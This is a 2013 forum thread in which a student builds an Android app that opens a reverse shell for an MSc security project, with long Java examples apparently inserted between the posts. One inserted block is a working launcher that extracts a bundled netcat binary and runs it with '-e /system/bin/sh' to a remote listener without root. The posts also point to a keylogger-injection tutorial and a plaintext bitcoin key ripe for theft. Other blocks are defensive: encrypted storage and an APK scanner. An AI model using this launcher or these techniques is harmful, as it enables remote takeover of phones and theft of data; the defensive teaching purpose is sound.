
Build Security Holes into Android App

  • 26-05-2013 5:57pm
    #1
    Registered Users Posts: 1,127 ✭✭✭


    Hi All,

    I'm working on an android app as part of a college project.

    The project is related to android security and one part of it is going to involve building a security hole into the app and then demonstrating exploiting that security hole by being able to access the phone remotely.

    I'm unsure how to build a security hole into the app though. Can anyone recommend how this could be done?

    Maybe, allowing the app some elevated permissions that allow an attack. Or maybe opening certain ports.

    Cheers


Comments

  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    mossy464 wrote: »
    I'm unsure how to build a security hole into the app though. Can anyone recommend how this could be done?
    I recommend you Google for some examples of security holes and then replicate them.

    One that pops to mind is to write an app that allows you to store passwords - which you do in a text file in the protected app storage. Then write a second app, and give it root permissions, that navigates to that file and reads the file with the passwords. The moral of the story being that you should always encrypt such data.

    You could store that file also on the external card, which is accessible without root permissions - but I'm not sure if that really qualifies as a security hole as opposed to just really, really dumb coding.
    Or maybe opening certain ports.
    Were you thinking of writing a server app?
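The plaintext-password-file hole suggested above, as an added example (not code from the post): the vulnerable store beside a sealed version, written as plain JVM Java so it runs on a desktop. On Android the file would live under `getFilesDir()` (MODE_PRIVATE), which keeps other unprivileged apps out but not a root-privileged app, an adb backup or a forensic image. The fix derives the key from a passphrase the user types; a key written next to the data in the same directory would change nothing. Assumes a JCE provider offering AES/GCM/NoPadding and PBKDF2WithHmacSHA1 (any current JRE or Android); the passphrase and secrets are constructed sample data.

```java
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

/** Vulnerable "password store" next to the sealed version (added example, not from the thread). */
public class PasswordStore {
    private static final int SALT_LEN = 16, IV_LEN = 12, TAG_BITS = 128, PBKDF2_ITERS = 100000;

    /** The hole: secrets hit the disk exactly as typed. App-private storage only keeps other
     *  unprivileged apps out; a rooted device, an adb backup or a forensic image reads this directly. */
    static void saveVulnerable(File f, String secrets) throws IOException {
        Files.write(f.toPath(), secrets.getBytes(StandardCharsets.UTF_8));
    }

    /** The fix: key derived from a user passphrase with PBKDF2, data sealed with AES-GCM.
     *  On-disk layout: salt || iv || ciphertext+tag. Root still reads the file, but gets only ciphertext. */
    static void saveEncrypted(File f, char[] passphrase, String secrets) throws Exception {
        SecureRandom rnd = new SecureRandom();
        byte[] salt = new byte[SALT_LEN];
        byte[] iv = new byte[IV_LEN];          // fresh IV per write: GCM breaks on IV reuse under one key
        rnd.nextBytes(salt);
        rnd.nextBytes(iv);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, iv));
        byte[] ct = c.doFinal(secrets.getBytes(StandardCharsets.UTF_8));
        byte[] blob = new byte[SALT_LEN + IV_LEN + ct.length];
        System.arraycopy(salt, 0, blob, 0, SALT_LEN);
        System.arraycopy(iv, 0, blob, SALT_LEN, IV_LEN);
        System.arraycopy(ct, 0, blob, SALT_LEN + IV_LEN, ct.length);
        Files.write(f.toPath(), blob);
    }

    /** Reverse of saveEncrypted. A wrong passphrase or a modified file fails with AEADBadTagException. */
    static String loadEncrypted(File f, char[] passphrase) throws Exception {
        byte[] blob = Files.readAllBytes(f.toPath());
        byte[] salt = Arrays.copyOfRange(blob, 0, SALT_LEN);
        byte[] iv = Arrays.copyOfRange(blob, SALT_LEN, SALT_LEN + IV_LEN);
        byte[] ct = Arrays.copyOfRange(blob, SALT_LEN + IV_LEN, blob.length);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, deriveKey(passphrase, salt), new GCMParameterSpec(TAG_BITS, iv));
        return new String(c.doFinal(ct), StandardCharsets.UTF_8);
    }

    private static SecretKey deriveKey(char[] passphrase, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(passphrase, salt, PBKDF2_ITERS, 256);
        byte[] raw = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(spec).getEncoded();
        spec.clearPassword();
        return new SecretKeySpec(raw, "AES");
    }

    public static void main(String[] args) throws Exception {
        String secrets = "mail: hunter2\nbank: correct horse battery staple\n";   // constructed sample data
        char[] passphrase = "user passphrase".toCharArray();                        // constructed
        File plain = File.createTempFile("passwords", ".txt");
        File sealed = File.createTempFile("passwords", ".enc");
        saveVulnerable(plain, secrets);
        saveEncrypted(sealed, passphrase, secrets);
        // What the root-privileged "second app" from the post sees in each file:
        System.out.println("plain file:\n" + new String(Files.readAllBytes(plain.toPath()), StandardCharsets.UTF_8));
        System.out.println("sealed file (hex): " + hex(Files.readAllBytes(sealed.toPath())));
        System.out.println("sealed file, with the passphrase:\n" + loadEncrypted(sealed, passphrase));
    }

    private static String hex(byte[] b) {
        StringBuilder sb = new StringBuilder();
        for (byte x : b) sb.append(String.format("%02x", x));
        return sb.toString();
    }
}
```

The first `println` is the "second app with root" reading the file: with `saveVulnerable` it gets the passwords, with `saveEncrypted` it gets salt, IV and ciphertext and still has to guess the passphrase (PBKDF2 makes each guess cost 100,000 HMAC rounds). Writing to external storage, the other option in the post, makes the plaintext file readable without root at all.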


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Thanks for the suggestions. Not thinking of doing a server app.

    This app is one part of my thesis for my MSc. Also doing pen testing on Android and iPhone but currently trying to find the best way of doing it.


  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    mossy464 wrote: »
    Thanks for the suggestions. Not thinking of doing a server app.

    This app is one part of my thesis for my MSc. Also doing pen testing on Android and iPhone but currently trying to find the best way of doing it.
    Pen testing of what?

    From what you've stated, you are seeking to demonstrate security flaws in an Android app that can be exploited. For this you're essentially going to have to write two apps; one app which is the target with the hole and a second one to exploit it (although it may not necessarily have to be an app, if what you're doing is, for example, demonstrating how transmitted data may be intercepted).

    So your first port of call should really be to identify what your hole is (no pun intended), not to go out and try to discover a brand new one - it's only an MSc after all. Hence I'm not entirely sure why you're doing any pen testing; it's a bit random.

    I suggest you spend some time to research discovered holes and choose the one you want to recreate. Then write the solution to demonstrate it and write it up.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Thanks again for your in depth replies. You are giving me plenty of food for thought. Kind of have a better idea of what I'm going to do now.

    As part of my research proposal I stated I would perform pen testing of Androids and iPhones, i.e. trying to gain access with tools like Metasploit etc.

    From what I've seen online this will be pretty difficult with up to date phones as any known security vulnerabilities have been patched.

    What you have suggested seems to be the best way to move forward with it.


  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    mossy464 wrote: »
    As part of my research proposal I stated I would perform pen testing of Androids and iPhones, i.e. trying to gain access with tools like Metasploit etc.
    See how proposal padding before you've done some research can get you into trouble? :p
    From what I've seen online this will be pretty difficult with up to date phones as any known security vulnerabilities have been patched.
    Except you're not trying to exploit the OS, but an app and many have not been patched. Again find an example, write an exploitable app and then pen test it knowing in advance that one of your tests will find the expected exploit. Then you can write your own 'malicious' test solution to demonstrate what such an exploit would look like in the wild.

    Then write it up, pad the start with a load on typical exploits, methodologies, the history of such exploits in mobile (you can go back as far as WTAI in WAP for this) and the end with conclusions/recommendation (best coding practices, yadda, yadda).

    OK, I'm outta here; flight to catch!


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Looking on the CVE Details website it shows 26 CVEs, are these the only ones that have been found for Android? I was expecting more.

    http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html


  • Registered Users Posts: 8,004 ✭✭✭ironclaw


    Just to add my two cents, iOS is fairly locked down from a security perspective. Very few of the Android-esque attacks exist on iOS due to the app approval procedure and the way apps can actually access the iOS system.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    ironclaw wrote: »
    Just to add my two cents, iOS is fairly locked down from a security perspective. Very few of the Android-esque attacks exist on iOS due to the app approval procedure and the way apps can actually access the iOS system.

    Yep. The main focus of the project is Android since it's the most targeted platform and iOS is so secure.


  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    mossy464 wrote: »
    Yep. The main focus of the project is Android since it's the most targeted platform and iOS is so secure.
    Popular misconception.

    It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Popular misconception.

    It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.

    Thanks, is the CVE list of 26 for Android the only CVEs for the platform? I was expecting more.

    http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html

    By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.

    http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=android


  • Registered Users Posts: 18,272 ✭✭✭✭Atomic Pineapple


    mossy464 wrote: »
    Thanks, is the CVE list of 26 for Android the only CVEs for the platform? I was expecting more.

    http://www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html

    By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.

    http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=android

    Indeed, most of Android's vulnerabilities come from poorly written applications rather than the OS itself.


  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    mossy464 wrote: »
    By searching on cve.mitre.org I found more but the majority of these are Adobe vulnerabilities.
    There's a surprise :cool:


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    I've found the following blog about creating a reverse shell on the Android device.

    http://blog.clutchmobile.com/2013/01/08/android-reverse-shell/

    I think this is what I may try to recreate, I'm a bit confused about the use of netcat and busybox, has the blog poster compiled linux C versions of these to work with Android?


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    So since earlier I've figured out a few things, basically about compiling netcat for Android. I've followed this tutorial

    http://codeseekah.com/2012/08/07/port-forwarding-an-android-local-port/

    I'm trying to get netcat across to my HTC Desire X via adb to the /data/local folder but permission denied. I'm trying to find a directory on the phone that is writable and will allow me to execute but so far no luck.

    The phone is running Android 4.0.4.

    Any ideas on this?


  • Registered Users Posts: 2,739 ✭✭✭MyPeopleDrankTheSoup


    Spamming my own stuff here, but I wrote a post about editing the SwiftKey Android keyboard APK to insert a keylogger that could be something you could use:
    http://www.android-app-development.ie/blog/2013/03/06/inserting-keylogger-code-in-android-swiftkey-using-apktool/

    Another vulnerability I noticed is this popular Android wallet:
    https://play.google.com/store/apps/details?id=de.schildbach.wallet&hl=en

    It stores the bitcoin private key in plaintext. If you could get root access on the phone, you could get this and steal the bitcoins.


  • Registered Users Posts: 2,739 ✭✭✭MyPeopleDrankTheSoup


    mossy464 wrote: »
    So since earlier I've figured out a few things, basically about compiling netcat for Android. I've followed this tutorial

    http://codeseekah.com/2012/08/07/port-forwarding-an-android-local-port/

    I'm trying to get netcat across to my HTC Desire X via adb to the /data/local folder but permission denied. I'm trying to find a directory on the phone that is writable and will allow me to execute but so far no luck.

    The phone is running Android 4.0.4.

    Any ideas on this?

    I presume you've rooted your HTC Desire?


  • Registered Users Posts: 2,739 ✭✭✭MyPeopleDrankTheSoup


    Popular misconception.

    It's the vetting procedure that makes iOS more secure (and even then things slip through), not the OS. In terms of security flaws, there's not much difference between the two operating systems.

    and the fact that only apple signed code can run on non-jailbroken iOS?


  • Closed Accounts Posts: 19,777 ✭✭✭✭The Corinthian


    and the fact that only apple signed code can run on non-jailbroken iOS?
    Yes, that was implied - or should have been better implied - by my statement.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    I presume you've rooted your HTC Desire?

    No, it's not rooted, but according to the tutorial I followed that folder should be writable on an unrooted phone. It's probably something to do with my particular HTC version of Android.

    I was able to copy and execute to the data/local folder on an Android emulator but there's an issue with the IP address setup on the emulator so I can't netcat to it.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Right, I got the copy of netcat copied to /data/local/tmp on my HTC desire and had to chmod it to give it execute permissions.

    Does anyone know what versions of netcat include the -e option?

    Trying to find one with this included and compile it for Android.


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    I've got netcat compiled for Android now with the -e option. I've started another thread about running commands like ping via Android app code. See the following thread if you want to have a look.

    http://www.boards.ie/vbulletin/showthread.php?t=2056973105


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Well, I've finally got something working properly.

    I have an app now working which runs netcat and sends a reverse shell back to a listening server. It even works on non-rooted devices.

    Thanks for all the tips and suggestions on here.
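What the working app described above boils down to, as an added example (not the poster's code): the netcat binary compiled earlier in the thread is shipped in the APK's `assets/`, copied into the app's private files directory, marked executable (the same chmod step the poster needed in `/data/local/tmp`) and started with `-e /system/bin/sh` pointing at the listener. No root is needed because the app owns the file and, on Android 4.x, its data directory is not mounted noexec. Assumptions: the asset is named `nc`, the manifest declares `android.permission.INTERNET`, and the listener side is something like `nc -l -p 4444 -v`. Caveat for anyone repeating this today: from Android 10, apps targeting API 29 are denied execution of files in their writable data directory, so a native executable has to ship under `lib/` and run from `applicationInfo.nativeLibraryDir`.

```java
import android.content.Context;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

/**
 * Added example: extract a bundled ARM netcat (built with -e support) from assets and hand a
 * shell to a listener. Needs android.permission.INTERNET; assumes the asset is called "nc".
 */
public class ReverseShellLauncher {

    /** Copy assets/<assetName> into the app's private files directory and mark it owner-executable. */
    static File extractBinary(Context ctx, String assetName) throws IOException {
        File out = new File(ctx.getFilesDir(), assetName);
        InputStream in = ctx.getAssets().open(assetName);
        OutputStream os = new FileOutputStream(out);
        try {
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                os.write(buf, 0, n);
            }
        } finally {
            in.close();
            os.close();
        }
        // Same as the chmod the thread needed in /data/local/tmp: execute bit for the app's own uid only.
        // No root involved: the app owns the file, and on Android 4.x the files dir is not noexec.
        if (!out.setExecutable(true, true)) {
            throw new IOException("cannot make executable: " + out);
        }
        return out;
    }

    /** Equivalent of "nc -e /system/bin/sh HOST PORT". Arguments go in an array, so no shell parses them. */
    static Process launch(Context ctx, String host, int port) throws IOException {
        File nc = extractBinary(ctx, "nc");
        String[] cmd = { nc.getAbsolutePath(), "-e", "/system/bin/sh", host, Integer.toString(port) };
        return Runtime.getRuntime().exec(cmd);
    }
}
```

`launch(getApplicationContext(), "192.0.2.10", 4444)` from a background thread is the whole trigger; the returned `Process` is the netcat child, and the shell it spawns runs as the app's uid with only the app's permissions, which is exactly why the `-e` variant of netcat was needed rather than a `-c` shell one-liner.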


  • Registered Users Posts: 1,127 ✭✭✭mossy464


    Well, I've finished the app and almost finished the thesis. Now I just need to make a suggestion on how to fix the problem that allows the app to work.

    The app uses the Runtime.getRuntime().exec method to run the netcat ARM binary from the app.

    Does anyone know if there would be any way of blocking the use of this method?

    I'm trying to think of anything that would prevent the netcat binary from being run in the app.
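On the question of blocking it: nothing inside the app can stop the app calling its own `Runtime.exec`, so the controls sit outside it. The platform side is SELinux and W^X (from Android 10, apps targeting API 29 cannot execute files from their writable data directory at all); the network side is egress filtering of the outbound connection; and the store side is vetting before install. The following added example (not the poster's code) is a vetting heuristic of the last kind: it walks an APK as a zip, flags ELF binaries anywhere outside `lib/`, and looks in `classes.dex` for the `Ljava/lang/Runtime;` type plus a method name `exec` (dex strings are length-prefixed and NUL-terminated, so `\4exec\0` matches the bare name and not `execute`), or for `ProcessBuilder`. It is triage only: reflection, string obfuscation or a payload downloaded at runtime all evade it. The "APK" it scans in `main` is constructed in memory and is not a real app.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/** Added example: pre-install triage for bundled native executables and the code that could run them. */
public class ApkExecScanner {
    private static final byte[] ELF_MAGIC = { 0x7f, 'E', 'L', 'F' };
    // Dex string_data items are uleb128(length) + MUTF-8 + NUL, so "\4exec\0" matches the bare
    // method name "exec", not "execute" or "executor" (a field named exec would still match).
    private static final byte[] EXEC_NAME = { 4, 'e', 'x', 'e', 'c', 0 };
    private static final byte[] RUNTIME_TYPE = ascii("Ljava/lang/Runtime;");
    private static final byte[] PROCBUILDER_TYPE = ascii("Ljava/lang/ProcessBuilder;");

    public static List<String> scan(InputStream apk) throws IOException {
        List<String> findings = new ArrayList<String>();
        ZipInputStream zin = new ZipInputStream(apk);
        for (ZipEntry e = zin.getNextEntry(); e != null; e = zin.getNextEntry()) {
            if (e.isDirectory()) continue;
            String name = e.getName();
            byte[] data = readAll(zin);                       // read() returns -1 at the end of each entry
            if (indexOf(data, ELF_MAGIC) == 0 && !name.startsWith("lib/")) {
                findings.add("ELF binary outside lib/: " + name);
            }
            if (name.startsWith("classes") && name.endsWith(".dex")) {
                if (indexOf(data, RUNTIME_TYPE) >= 0 && indexOf(data, EXEC_NAME) >= 0) {
                    findings.add(name + ": references java.lang.Runtime and a method named exec");
                }
                if (indexOf(data, PROCBUILDER_TYPE) >= 0) {
                    findings.add(name + ": references java.lang.ProcessBuilder");
                }
            }
        }
        return findings;
    }

    static byte[] readAll(InputStream in) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        for (int n; (n = in.read(buf)) != -1; ) bos.write(buf, 0, n);
        return bos.toByteArray();
    }

    /** Naive byte search; APKs are small enough that this is fine for triage. */
    static int indexOf(byte[] hay, byte[] needle) {
        outer:
        for (int i = 0; i + needle.length <= hay.length; i++) {
            for (int j = 0; j < needle.length; j++) if (hay[i + j] != needle[j]) continue outer;
            return i;
        }
        return -1;
    }

    static byte[] ascii(String s) { return s.getBytes(StandardCharsets.US_ASCII); }

    /** Builds a constructed, minimal "APK" in memory (not a real app) and scans it. */
    public static void main(String[] args) throws IOException {
        ByteArrayOutputStream zipBytes = new ByteArrayOutputStream();
        ZipOutputStream zout = new ZipOutputStream(zipBytes);
        put(zout, "assets/nc", concat(ELF_MAGIC, ascii("...stripped arm netcat...")));            // flagged
        put(zout, "lib/armeabi/libhelper.so", concat(ELF_MAGIC, ascii("...ordinary jni lib...")));   // not flagged
        put(zout, "classes.dex", concat(ascii("dex\n035\0"), RUNTIME_TYPE, new byte[] { 0 },
                                        EXEC_NAME, ascii("\ngetRuntime\0")));                        // flagged
        put(zout, "res/layout/main.xml", ascii("<LinearLayout/>"));
        zout.close();
        for (String f : scan(new ByteArrayInputStream(zipBytes.toByteArray()))) System.out.println(f);
    }

    static void put(ZipOutputStream z, String name, byte[] body) throws IOException {
        z.putNextEntry(new ZipEntry(name));
        z.write(body);
        z.closeEntry();
    }

    static byte[] concat(byte[]... parts) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        for (byte[] p : parts) bos.write(p, 0, p.length);
        return bos.toByteArray();
    }
}
```

Run against the thesis app from the thread, the scanner would report the netcat binary in `assets/` and the `Runtime.exec` reference in `classes.dex`; run against the same app repackaged with the binary under `lib/` and the call made through reflection, it would report nothing, which is the honest limit of string-level vetting and the reason the durable fix is the platform-level W^X policy rather than any check in the app.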

